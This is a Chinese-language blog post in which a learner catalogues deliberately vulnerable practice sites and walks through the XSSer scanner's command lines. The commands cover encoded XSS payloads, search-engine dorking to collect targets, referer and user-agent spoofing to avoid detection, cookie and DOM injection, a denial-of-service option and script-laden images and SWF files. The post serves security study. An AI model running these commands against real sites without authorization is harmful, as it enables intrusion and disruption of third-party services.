XSS扫描系统原理

那个broken web application 后续会慢慢研究的。。。先把工作任务完成。。

工作任务1:搜索类似演示网站

http://code.google.com/p/websecurify/wiki/DemoSites

工作任务2:检索XSS自动化扫描工具,开源,了解检测原理

=================================================================

(一 )工作任务1:搜索类似演示网站

示例网站http://code.google.com/p/websecurify/wiki/DemoSites

Details

The following websites may be used to compare Websecurify with other automated web application security testing tools:

Google检索到“猪在笑”总结的这些演示网站

S.No. Vulnerable Application Platform Remark
1 SPI Dynamics (live) ASP 漏扫厂商的缺陷demo站点,想学习还是可以玩的。有新花样最好本地玩吧,除非你是活雷锋。
2 Cenzic (live) PHP 同1
3 Watchfire (live) ASPX 同1
4 Acunetix 1 (live) PHP 同1
5 Acunetix 2 (live) ASP 同1
6 Acunetix 3 (live) ASP.Net 同1
7 PCTechtips Challenge (live) online hack challenge, just for fun
8 Damn Vulnerable Web Application PHP/MySQL 有提供Live CD版,适合懒人
9 Mutillidae PHP 针对OWASP的Top 10名单设置针对性的缺陷供你耍,必须推荐
10 The Butterfly Security Project PHP  
11 Hacme Casino Ruby on Rails Hacme系列is copyright by McAfee, but toooooooooooold! take it as you will and at your own risk.
12 Hacme Bank 2.0 ASP.NET (2.0) 同上,不解释。
13 Updated HackmeBank ASP.NET (2.0) 链接失效?我没用过。
14 Hacme Books J2EE 还是Hacme。。。
15 Hacme Travel C++ (application client-server) 又是Hacme。。。不过这个是C++的,比较少见。也许有价值,我没用过
16 Hacme Shipping ColdFusion MX 7, MySQL ColdFusion平台的,有针对性的可以搭建一下试试,我没用过
17 OWASP WebGoat JAVA 适合教学
18 OWASP Vicnum PHP, Perl  
19 OWASP InsecureWebApp JAVA  
20 OWASP SiteGenerator ASP.NET  
21 Moth  
22 Stanford SecuriBench JAVA  
23 SecuriBench Micro JAVA  
24 BadStore Perl(CGI)  
25 WebMaven/Buggy Bank (very old)    
26 EnigmaGroup (live)    
27 XSS Encoding Skillsx5s (Casaba Watcher)   Fiddler的扩展,辅助XSS漏洞挖掘(多种字符编码转换支持)
28 Google Gruyere(live) (previously Jarlsberg)   可以在线玩,GAE supported. So, if you are in CH1N4, you may need a VPN or proxy to access it.
29 Exploit- DB Multi-platform 最真实的Web App漏洞资料库,totally damn real!看上哪个,直接官网下载对应缺陷版本,本地想怎么玩就怎么玩。
30 exploit-kb-vulnerable-web-app PHP/MySQL 文档清晰,易部署,有Vmware Image版,适合懒人

“猪在笑”推荐几个手工的辅助工具,个人感觉挺好~

Tool Category Remark Similar
paros HTTP代理/HTTP协议调试/spider 最新开源版3.2.13更新于2006年,后续版本已经完全商业化。但工具的易用性、功能在今天来看都是值得推荐的。支持HTTP协议双向数据查看/修改/过滤是其亮点。 burp proxy ,Fiddlerlive http headers (Firefox addon),Firebug (Many browsers’ addon)
HackBar 手工SQL注入辅助 方便转码、编码、填充垃圾字符,绕过滤必备
TamperData HTTP请求参数控制 拦截HTTP/HTTPS请求,允许手工修改HTTP请求参数(GET参数、POST字段、cookie等)后再提交
Groundspeed 客户端安全措施半自动化解除 自动检测隐藏表单字段、去除表单验证等,免去自己通过Firebug修改html代码的麻烦
BuiltWith (Chrome扩展) 网站架构自动分析 自动检测和识别当前浏览网站所采用的技术架构,脚本小子的最爱

Google 检索到一份整理好的渗透测试学习资源列表

by http://www.pulog.org/Resources/2242/Pentesting-Vulnerable/

Web Pentesting

Application Name Company/Developer URL
OWASP WebGoat OWASP http://www.owasp.org/index.php/OWASP_WebGoat_Project
OWASP Vicnum OWASP http://www.owasp.org/index.php/Category:OWASP_Vicnum_Project
OWASP InsecureWebApp OWASP http://www.owasp.org/index.php/Category:OWASP_Insecure_Web_App_Project
Web Security DOJO Maven Security Consulting http://www.mavensecurity.com/web_security_dojo/
Gruyere (antigo Codelab / Jalsberg) Google http://google-gruyere.appspot.com/
Hacme Game NTNU http://hacmegame.org/
SPI Dynamics SPI Dynamics http://zero.webappsecurity.com/
Acunetix 1 Acunetix http://testphp.vulnweb.com/
Acunetix 2 Acunetix http://testasp.vulnweb.com/
Acunetix 3 Acunetix http://testaspnet.vulnweb.com/
PCTechtips Challenge PC Tech Tips http://pctechtips.org/hacker-challenge-pwn3d-the-login-form/
Damn Vulnerable Web Application DVWA http://dvwa.co.uk/
Mutillidae Iron Geek http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10
The Butterfly Security Project The Butterfly Security http://sourceforge.net/projects/thebutterflytmp/
Hacme Casino McAfee http://www.mcafee.com/us/downloads/free-tools/hacme-casino.aspx
Hacme Bank 2.0 McAfee http://www.mcafee.com/us/downloads/free-tools/hacme-bank.aspx
Updated HackmeBank McAfee http://www.o2-ounceopen.com/technical-info/2008/12/8/updated-version-of-hacmebank.html
Hacme Books McAfee http://www.mcafee.com/us/downloads/free-tools/hacmebooks.aspx
Hacme Travel McAfee http://www.mcafee.com/us/downloads/free-tools/hacmetravel.aspx
Hacme Shipping McAfee http://www.mcafee.com/us/downloads/free-tools/hacmeshipping.aspx
Moth Bonsai Sec http://www.bonsai-sec.com/en/research/moth.php
Stanford SecuriBench Standford http://suif.stanford.edu/%7Elivshits/securibench/
SecuriBench Micro Standford http://suif.stanford.edu/%7Elivshits/work/securibench-micro/
BadStore BadStore http://www.badstore.net/
WebMaven/Buggy Bank Maven Security http://www.mavensecurity.com/webmaven
EnigmaGroup Enigma Group http://enigmagroup.org/
XSS Encoding Skills – x5s (Casaba Watcher) X5S http://www.nottrusted.com/x5s/
Exploit- DB Exploit DB http://www.exploit-db.com/webapps
The Bodgeit Store The Bodgeit Store http://code.google.com/p/bodgeit/
LampSecurity MadIrish http://sourceforge.net/projects/lampsecurity/
hackxor Hackxor http://hackxor.sourceforge.net/cgi-bin/index.pl
WackoPicko WackoPicko

https://github.com/adamdoupe/WackoPicko

RSnake’s Vulnerability Lab RSnake http://ha.ckers.org/weird/

 

War Games

Application Name Company / Developer URL
Hell Bound Hackers Hell Bound Hackers http://hellboundhackers.org/
Vulnerability Assessment Kevin Orrey http://www.vulnerabilityassessment.co.uk/
Smash the Stack Smash the Stack http://www.smashthestack.org/
Over the Wire Over the Wire http://www.overthewire.org/wargames/
Hack This Site Hack This Site http://www.hackthissite.org/
Hacking Lab Hacking Lab https://www.hacking-lab.com/
We Chall We Chall https://www.wechall.net/
REMnux REMnux http://zeltser.com/remnux/

 

Insecure Distributions

Application Name Company / Developer URL
Damm Vulnerable Linux DVL http://www.damnvulnerablelinux.org/
Metasploitable Offensive Security http://blog.metasploit.com/2010/05/introducing-metasploitable.html
de-ICE Hacker Junkie http://www.de-ice.net/
Moth Bonsai SecuritySoftware http://www.bonsai-sec.com/en/research/moth.php
PwnOS Niel Dickson http://www.neildickson.com/os/
Holynix Pynstrom http://pynstrom.net/holynix.php

(二)工作任务2:XSS自动化扫描器系统原理

1.Google到一个关于xss的扫描器,sourceforge的xsser,以下是它的简介:

Cross Site "Scripter" is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications.
大概就是说它是个自动扫描利用漏洞并且报告之的东东,和我要找的符合。
源码checkout地址:svn://svn.code.sf.net/p/xsser/code

2.Google把自己的内部审计XSS的工具开源了 ratproxy

 Google 推出一套免費的 Web 安全評估工具,叫做 RatProxy,這套工具可以檢測、分析您的網站是否有安全性漏洞或網頁是否有被入侵,目前可支援 Linux, FreeBSD, MacOS X, 與 Windows (Cygwin) 等執行環境(反正就是 Unix-like 的環境啦)。
RatProxy 可偵測到的漏洞包括 Cross-site Scripting (XSS, 跨網站指令碼)、指令碼惡意置入(script inclusion issues), 惡意網頁內容(content serving problems), insufficient XSRF 以及 XSS 防護(XSS defenses) 等。

以下是Google到的Ratproxy用法:
Ratproxy 工作流程:
  • 1) 运行脚本后,会在本地启动一个代理服务器,默认端口是 8080 ;
  • 2) 浏览器设置这个地址 ([url]http://localhost:8080[/url])为 代理地址 ;
  • 3) 浏览要测试的 Web 页面,进行实际登录,填写表单等操作(这些动作会被代理服务器捕捉并做点"手脚"发给待检测的页面),ratproxy 会在后台记录相关的 Log ;
  • 4) 用 ratproxy 提供的工具解析 Log 并输出 <acronym title="HyperText" markup="" language "="" style="padding: 0px; margin: 0px; ">HTML 进行分析;
  • 5) 修正比较严重的问题后,跳回到第一步,直到评估通过为止。
在我的 Ubuntu 下测试了一下,需要说一下的是,本地系统需要安装 libssl-dev 与 openssl 。
$ sudo apt-get install libssl-dev openssl 
$ cd ratproxy ; make
然后就可以提交类似:
$ ./ratproxy -v . -w foo.log -d foo.com -lfscm 

3.Google 到 XSSDetect 是一款微软公司为开发人员提供针对跨站脚本攻击的静态分析工具

XSSDetect是精简版的.NET代码分析工具,原本供微软内部人员寻找应用软件的安全漏洞之用,大概是受开源思想影响,现在已经可以免费下载了。
下完就能傻瓜化安装了
这是XSSDetect的用法:

Sample Usage

  1. Launch Visual Studio
  2. Open a solution containing at least on C#, J# or VB.NET project
  3. Build the solution
  4. Click on Tools | XSSDetect Code Analysis, the Summary View dockable tool window activates
  5. Verify/edit the current settings (click on General Settings, Rules or Target Assemblies on the toolbar of the Summary View)
  6. Start the code analysis (use the Analyze button on the toolbar)
  7. After the analysis is complete, the Summary View tool window shows the results, and the output window shows information and error messages
  8. Double click on a result item in the Summary View to activate the Detail View
  9. In the Detail View, double click on a dataflow item to display the corresponding source line
  10. Use the "Previous" and "Next" buttons in the Detail View to display other result items 
看到这个Launch Visual Studio就知道这个要用VS啦,挺麻烦的说。。。
看了下资料,发现这个XSSer的资料多一些,还是中文版的,就研究它了。

(三)研究XSSer系统运行原理

1.先在虚拟机上安装好相关软件如Ihttp://xsser.sourceforge.net/所说的:
Installation

XSSer runs on many platforms. It requires Python and the following libraries:


- python-pycurl - Python bindings to libcurl
- python-beautifulsoup - error-tolerant HTML parser for Python
- python-libxml2 - Python bindings for the GNOME XML library
- python-geoip - Python bindings for the GeoIP IP-to-country resolver library


On Debian-based systems (ex: Ubuntu), run:


sudo apt-get install python-pycurl python-beautifulsoup python-libxml2 python-geoip 


Ps:如果有些安装不了,那是因为有些软件包需要升级。具体怎么升级可以看看:

Ps:如果你下载了XSSer的包,里面有个 /doc/INSTALL,别看了,里面的信息太老了,竟然要用到Python-xml,哎。




VMware安装虚拟机Ubuntu的时候,安装完毕后是命令行模式,得重启后才能进入图形界面。

=======================================================================

XSSer 安装与测试

1. Installation 安装python相关组件

XSSer runs on many platforms. It requires Python and the following libraries:

- python-pycurl - Python bindings to libcurl
- python-beautifulsoup - error-tolerant HTML parser for Python
- python-libxml2 - Python bindings for the GNOME XML library
- python-geoip - Python bindings for the GeoIP IP-to-country resolver library


在Ubuntu下用这个指令就能够安装后所有的要用到python模块:
[plain]  view plain copy
  1. sudo apt-get install python-pycurl python-beautifulsoup python-libxml2 python-geoip   

2.下载XSSer相应的包并且安装

下载地址:http://sourceforge.net/projects/xsser/files/xsser_1.6-1.tar.gz/download

下载后用以下指令:

安装:

[plain]  view plain copy
  1. tar xzvf xsser-1.6_all.deb.tar.gz  
  2. sudo dpkg -i xsser-1.6_all.deb  

以GTK模式(也就是图形化模式运行)(GTK mode):
[plain]  view plain copy
  1. xsser --gtk --silent   


Ps:当然你也可以SVN check out 源代码:
[plain]  view plain copy
  1. $ svn co https://xsser.svn.sourceforge.net/svnroot/xsser xsser   

3.XSSer语法的掌握 (官网写的是 python xsser.py -u "http://www.baidu.com",我用的xsser -u "http://www.baidu.com",都行)

(1)最简单的注入

[plain]  view plain copy
  1. xsser -u "http://www.baidu.com"  

(2)从文件中读取URL,带有代理和HTTP REFERER的注入

[plain]  view plain copy
  1. xsser -i url.txt  --proxy "http://127.0.0.1:8118" --referer 666.666.666.666  
Ps:HTTP Referer是HTTP header的一部分,浏览器向web服务器发送请求的时候,一般会用到referer,以便告诉web服务器我是从哪个页面过来的,方便web服务器统计。而我们加个--referer 666.666.666.666,实际上是不想被web服务器发现我们从哪里来。其实它应该被写成HTTP Refferer,但是写错的人多了,写标准的货也就将就用HTTP Referer啦。。

(3)使用Cem(Character Encoding Mutations 字符编码基因突变),使用user-agent,设置超时时间,设置线程数

[plain]  view plain copy
  1. xsser -u "http://www.baidu.com" --auto --Cem "Hex,Str,Hex" --user-agent "XSSer!!" --timeout "20" --threads "5"  

Ps1:Cem就是先用Hex编码,再转为Str编码,然后再转为Hex编码!

(first, change payload to hexadecimal; second, change to StringFromCharCode the first encoding; third, reencode to Hexadecimal the second encoding)

Ps2:user-agent 也就是用户代理,这个域放置了一些信息如OS版本,CPU类型,浏览器版本,浏览器渲染引擎,浏览器语言,浏览器语言等,可以被web服务器获取,这里我们不想被web服务器获取,所以就设置了下“XSSer!!!”就好啦~~


(4)从文件读取(-i "urls.txt"),装载自己的代码(--payload ' ' ),并且用JS中的Unescape()函数解码(--Une)

[plain]  view plain copy
  1. xsser -i "urls.txt" --payload 'a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval(a+b+c+d);' --Une  
Ps:a+b+c+d得到字符串"getURL("javascript:alert('XSS')")" ,这个函数式Flash的常用函数,用来打开一个链接,无论是远程还是本地,只有满足一下两个条件,才能用这种形式的代码:
[plain]  view plain copy
  1. getURL("javascript:someFunction()")  
1)页面有Flash player 8 以及更高版本中
2)SWF文件或者包含该文件的web页面被包含在本地受信任的沙箱中
满足上述条件就能够用:

[plain]  view plain copy
  1. --payload 'eval(getURL("javascript:alert('XSS!!!')"))'  
思考1:为什么要分成abcd四个部分呢!?然后再合起来?

思考2:--Une为什么要用到这里?Unescape()函数对escape()函数编码过后的字符串进行解码,如果字符串不是编码后的字符串,则会把字符串原封不动的返回。也就是说,字符串被浏览器编码后送到web服务器吗?escape()一般用于脚本向某个页面如a.php这个URL传递参数时编码,可是我用的是XSSer,它在传递参数的时候会编码吗?

这两个问题等我以后深入了解再回来回答。


(5)指定引擎并且从引擎的返回结果作为target URL--XSSer Storm

[plain]  view plain copy
  1. xsser --De "duck" -d "search.php?"  

Ps1: duckduckgo是一个网站,搞搜索引擎的 "duck"。

Ps2:  -d DORK       把搜索结果作为攻击的目标URL ( Process search engine dork results as target urls)
Ps3:  --De=DORK_ENGINE  指定用到的引擎 for dorking 有这么多:(bing, altavista, yahoo, baidu, yandex, youdao, webcrawler, google, etc.)
                    

(6)指定抓取URL的深度和数量

    --Cw=CRAWLER_WIDTH  Deeping level of crawler: 1-5
    --Cl                Crawl only local target(s) urls (default TRUE)

[plain]  view plain copy
  1. xsser -c 3 --Cw=4 -u "http://www.baidu.com"  

(7)Post数据(Simple injection from URL, using POST, with statistics results)

[plain]  view plain copy
  1. xsser -u "http://host.com" -p "index.php?target=search&subtarget=top&searchstring=" -s  
Ps :-s, --statistics      show advanced statistics output results
思考:这个-s到底有什么用呢?统计数据?Post数据一般就是把数据封装到表单中然后发到web服务器请求。

回答:这个-s其实和post没关系,就是把数据给统计了:

===========================================================================
[*] Statistic:
===========================================================================
--------------------------------------------------
Test Time Duration:  0:00:05.929196
--------------------------------------------------
Total Connections: 2
-------------------------
200-OK: 1 | 404: 0 | 503: 0 | Others: 1
Connec: 50 %
--------------------------------------------------
Total Payloads: 1
-------------------------
Checker: 0 | Manual: 0 | Auto: 1 | DCP: 0 | DOM: 0 | Induced: 0 | XSR: 0 | XSA: 0 | COO: 0
--------------------------------------------------
Total Injections: 1
-------------------------
Failed: 1 | Sucessfull: 0
Accur : 0 %
-------------------------
Total Discovered: 0
-------------------------
Checker: 0 | Manual: 0 | Auto: 0 | DCP: 0 | DOM: 0 | Induced: 0 | XSR: 0 | XSA: 0 | COO: 0
--------------------------------------------------
False positives: 0 | Vulnerables: 0
-------------------------
Mana: 0
--------------------------------------------------
[I] Could not find any vulnerability!. Try another combination or hack it -manually- :)


===========================================================================

(8)Get请求 八进制编码(--Doo) 结果以简短URL形式(--short tinyurl)

[plain]  view plain copy
  1. xsser -u "http://host.com" -g "bs/?q=" --auto --Doo --short tinyurl   
思考:至今还是不知道Get请求和Post请求这些参数如 "bs/?q="要怎么设定的吗?我个人认为如果不知道网站的源代码,根本不知道参数怎么填?那么这个XSSer的参数是猜测的吗?


(9)Shadow DOM XSS攻击,跨站Cookie注入,最终代码FinalRemote(--Fr)

[plain]  view plain copy
  1. xsser -u "http://host.com" -g "bs/?q=" --Coo --Dom --Fr="!enter your final injection code here!"  
Ps1:    --Coo       跨站Cookie注入        COO - Cross Site Scripting Cookie injection 

Ps2:DOM XSS 攻击原理

Ps3:DOM shadow space (no server logging!) 这个DOM阴影空间貌似在哪里听过?可是就是找不到相关资料。。。终于google到了这篇文章,它讲的是Shadow DOM

什么是Shadow Dom?可能会给你带来点帮助。。。


(10) Dos(拒绝服务攻击)   网址压缩is.gd

[plain]  view plain copy
  1. xsser -u "http://host.com" -g "bs/?q=" --Dos --short "is.gd"  

Ps:根据官方介绍,Is.gd 至今已处理了近 900 万个网址。首页非常简洁,输入需要压缩的网址提交即可。生成缩略网址后系统会计算压缩前后的字符串长度,并给出压缩率。
如果想要让用户预览网页,而不是直接发送缩略网址(有助于用户了解所链接到的网址,防止被钓鱼),只需在缩略网址后添加连接字符 “-” 来开启网页预览功能。
例如,芒果的网址 http://www.mangguo.org 经过压缩后为 http://is.gd/Aqdn,网页预览地址为 http://is.gd/Aqdn-
注意:缩略网址 URL 中字母区分大小写。

XSSer结果会多了这么一行:

[plain]  view plain copy
  1. [/] Shortered URL (Injection): http://is.gd/eAxg3x  

(11) 在这些地方注入参数变量: HTTP USer-Agent,HTTP Referer ,  Cookie parameters

[plain]  view plain copy
  1. xsser -i "list_of_url_targets.txt" --auto --timeout "20" --threads "5" --delay "10" --Xsa --Xsr --Coo --proxy "http://127.0.0.1:8118" --Doo -s --verbose --Dos --short "tinyurl"  

Ps1:   --Xsa               XSA - Cross Site Agent Scripting

Ps2:   --Xsr               XSR - Cross Site Referer Scripting


(12)  创建一个假的XSS代码嵌入图像(create a false image with XSS code embedded)

[plain]  view plain copy
  1. xsser --imx "test.png" --payload "!enter your malicious injection code here!"   
思考:至今还是不会在这个恶意代码里面写点东西,到底要写什么好呢?
回答:这个 <script>alert('XSS');</script>可以吗?结果成功~
[plain]  view plain copy
  1. xsser --imx "test.jpg" --payload "<script>alert('XSS')</script>"  

(13)把积极的结果输出到指定的XML文件中(Report output 'positives' injections of a dorking search (using "ask" dorker) directly to a XML file).

[plain]  view plain copy
  1. xsser -d "login.php" --De "ask" --xml "security_report_XSSer_Dork_cuil.xml"   
Ps: --xml 指定一个XML文件,用来存放输出的”积极“结果,我猜测这个”积极“就是可能能够注入的结果URL
结果一打开xml文件,发现还真的是和我的猜想一致!我真的是神意识啊!~~


(14)把我们的扫描结果上传到某些网站上(twitter)这个功能真的是有爱啊~,不吐槽了。。

[plain]  view plain copy
  1. xsser -d "login.php" --De "duck" --tweet  
示例网站:

(15)创建一个swf电影注入XSS代码(Create a .swf movie with XSS code injected)

这个和那个图片的嵌入恶意代码差不多
[plain]  view plain copy
  1. xsser --fla "name_of_file.swf" --payload "<script>alert('XSS!!!');</script>"  

(16) 发送一个hash值,预先看看目标URL是否重复全部内容(send an unique hash, without vectors, to pre-check if target(s) repeats all content recieved)

[plain]  view plain copy
  1. xsser -u "http://www.baidu.com" --hash  
结果是:
[plain]  view plain copy
  1. Checker: looks like your target(s) does not repeat all received code.  
Ps:这句话很好懂哦: send an unique hash, without vectors, to pre-check if target(s) repeats all content recieved
思考:这个hash它是怎么去pre-check呢?如果要确认是否重复,首先我的有这个网页的URL的hash,然后我发给它,那么这个hash哪里来呢?难道是有文件存储着?第一次的话没有hash怎么办?
回答:不懂~真心不懂~等以后的我深入了解了再研究吧~

(17) Data Control Protocal(DCP) 数据控制协议 注入,这个好偏门的感觉

[plain]  view plain copy
  1. xsser -u "host.com" --auto --Dcp --Fp "enter_your_code_here" --short "is.gd"  



(18)META标签中的Base64编码(RFC2397),也是很偏门的感觉

[plain]  view plain copy
  1. xsser -u "host.com" -g "vulnerable_path" --payload "valid_vector_injected" --B64  
这个Base64编码:
[plain]  view plain copy
  1. --B64               B64    - Base64 code encoding in META tag (rfc2397)  

(19)启动浏览器,结束时发现的每个XSS(launch a browser at the end with each XSS discovered)

[plain]  view plain copy
  1. xsser -u "host.com" -g "vulnerable_path" --auto --Fr "my_host/path/code.js" --launch  
思考:都越来越不知道什么意思了。。。
直接贴英文吧:
[plain]  view plain copy
  1. Exploiting our "own" -remote code- in a payload discovered using fuzzing and launch it in a browser directly  


  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值